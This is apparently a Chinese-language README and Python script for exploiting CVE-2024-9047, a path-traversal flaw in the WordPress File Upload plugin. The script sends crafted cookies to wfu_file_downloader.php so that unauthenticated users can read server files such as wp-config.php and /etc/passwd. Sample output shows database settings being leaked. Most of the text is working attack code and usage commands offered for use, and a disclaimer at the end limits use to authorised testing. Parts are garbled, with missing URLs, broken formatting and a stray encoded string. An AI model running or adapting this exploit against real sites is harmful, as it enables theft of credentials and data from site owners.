本项目提供了一个针对 WordPress File Upload 插件中严重安全漏洞的利用脚本。该漏洞(CVE-2024-9047)影响插件 4.24.11 及之前的所有版本,允许未经身份验证的攻击者通过路径遍历读取或删除服务器上的任意文件。

wp-config.php)。requests 库克隆或下载本项目代码至本地:
git clone
cd CVE-2024-9047-Exploit
安装 Python 依赖(如果尚未安装 requests):
pip install requests
python CVE-2024-9047.py --url <目标WordPress站点URL> [--command <目标文件路径>]
--url, -u:必选参数,目标 WordPress 站点的根 URL(例如 )。--command, -c:可选参数,要读取的文件路径(相对于服务器文件系统根目录)。默认路径为 /../../../../../opt/lampp/htdocs/wordpress/wp-config.php。python CVE-2024-9047.py -u
工具将自动检测插件版本,若版本 ≤ 4.24.11 且 PHP 环境符合要求,则尝试读取默认的 wp-config.php 文件。
python CVE-2024-9047.py -u --command /../../../../../etc/passwd
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );
...
/wp-content/plugins/wp-file-upload/wfu_file_downloader.php 发送 POST 请求,携带恶意构造的 Cookie 和表单数据,利用路径遍历读取目标文件。def check_version(url):
try: if response.status_code == 200 and "Stable tag" in response.text:
for line in response.text.splitlines():
if "Stable tag" in line:
version = line.split(":")[1].strip()
print(f"Detected version: {version}")
if version <= "4.24.11":
print("The site is vulnerable!")
return True
else:
print("The site is not vulnerable.")
return False
else:
print("Unable to detect the plugin version.")
return False
except requests.RequestException as e:
print(f"Error checking version: {e}")
return False
def exploit(url, command):
try:
exploit_url = f"{url}/wp-content/plugins/wp-file-upload/wfu_file_downloader.php"
cookies = {
"wp_wpfileupload_testupload": "Nxploited",
"wfu_storage_file123": command,
"wfu_download_ticket_ticket123": "9876543210987",
"wfu_ABSPATH": "/",
}
data = {
"file": "file123",
"ticket": "ticket123",
"handler": "dboption",
"session_legacy": "1",
"dboption_base": "cookies",
"dboption_useold": "0",
"wfu_cookie": "wp_wpfileupload_testupload",
} response = requests.post(exploit_url, cookies=cookies, data=data, timeout=10) if response.status_code == 200:
print("Exploit successful! Response:")
print(response.text)
else:
print(f"Exploit failed. Response code: {response.status_code}")
except requests.RequestException as e:
print(f"Error during exploitation: {e}")
def main():
parser = argparse.ArgumentParser(description="The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.")
parser.add_argument("--url", "-u", required=True, help="Target URL (e.g., )")
parser.add_argument("--command", "-c", default="/../../../../../opt/lampp/htdocs/wordpress/wp-config.php", help="File path to read")
args = parser.parse_args() target_url = args.url.rstrip("/")
command = args.command if check_version(target_url):
exploit(target_url, command)
本工具及文档仅限用于安全研究、教育及授权的渗透测试。未经明确授权使用本工具攻击任何系统均属非法行为,使用者需自行承担一切法律责任。项目作者及贡献者对任何滥用行为不承担责任。 6HFtX5dABrKlqXeO5PUv/y6n7EBe6h2V2n05Vq1LwOqLqjbNI15A04sn614rpN95